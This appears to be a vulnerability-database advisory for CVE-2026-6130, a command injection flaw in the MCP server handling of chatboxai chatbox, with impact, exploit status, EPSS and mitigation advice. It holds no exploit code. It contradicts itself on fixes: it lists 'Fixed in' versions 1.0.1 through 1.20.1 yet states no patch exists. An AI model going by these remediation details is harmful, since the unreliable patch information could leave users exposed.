Platform
nodejs
Component
chatboxai/chatbox
Fixed in
1.0.1
1.1.1
1.2.1
1.3.1
1.4.1
1.5.1
1.6.1
1.7.1
1.8.1
1.9.1
1.10.1
1.11.1
1.12.1
1.13.1
1.14.1
1.15.1
1.16.1
1.17.1
1.18.1
1.19.1
1.20.1
CVE-2026-6130 is a Command Injection vulnerability affecting chatboxai chatbox versions 1.0.0 through 1.20.0. This flaw allows attackers to execute arbitrary operating system commands on the server, potentially leading to complete system compromise. The vulnerability resides in the StdioClientTransport function within the Model Context Protocol Server Management System component. A public exploit is available, increasing the risk of immediate exploitation.
Successful exploitation of CVE-2026-6130 allows an attacker to execute arbitrary commands on the server hosting the chatboxai chatbox application. This could lead to data exfiltration, system takeover, and potentially lateral movement within the network if the server has access to other resources. The remote nature of the vulnerability means an attacker does not need local access to exploit it. Given the availability of a public exploit, the blast radius is significant, particularly for organizations running unpatched instances of chatboxai chatbox. The impact is amplified if the chatboxai chatbox instance is exposed to the public internet or is part of a larger, interconnected system.
CVE-2026-6130 has a public exploit available, indicating a high probability of exploitation. The vulnerability was reported to the project but has not yet received a response, suggesting a potential lack of active maintenance. The vulnerability is tracked by the NVD and CISA. Given the ease of exploitation and lack of vendor response, organizations should prioritize mitigation efforts.
Exploit Status
EPSS
1.76% (83% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-6130 is to upgrade to a patched version of chatboxai chatbox. As of this writing, no patch has been released by the vendor. Until a patch is available, implement temporary workarounds such as strict input validation on the args/env parameters within the StdioClientTransport function. Deploy a Web Application Firewall (WAF) with rules to detect and block suspicious command injection attempts. Monitor system logs for unusual command execution patterns. After implementing mitigations, verify their effectiveness by attempting to reproduce the vulnerability with a safe, controlled payload.
Update to a patched version of chatboxai chatbox. The vendor has not responded to the vulnerability report, so it is recommended to check the official documentation or look for community forks with patches available. Review and secure the server configuration to mitigate the risk of command injection.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-6130 is a Command Injection vulnerability affecting chatboxai chatbox versions 1.0.0–1.20.0, allowing attackers to execute OS commands remotely.
You are affected if you are running chatboxai chatbox versions 1.0.0 through 1.20.0 and have not applied a patch or implemented mitigating controls.
Upgrade to a patched version of chatboxai chatbox. Until a patch is available, implement input validation and WAF rules as temporary mitigations.
Yes, a public exploit is available, indicating a high probability of active exploitation.
Check the chatboxai chatbox project's website and GitHub repository for updates and advisories regarding CVE-2026-6130.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.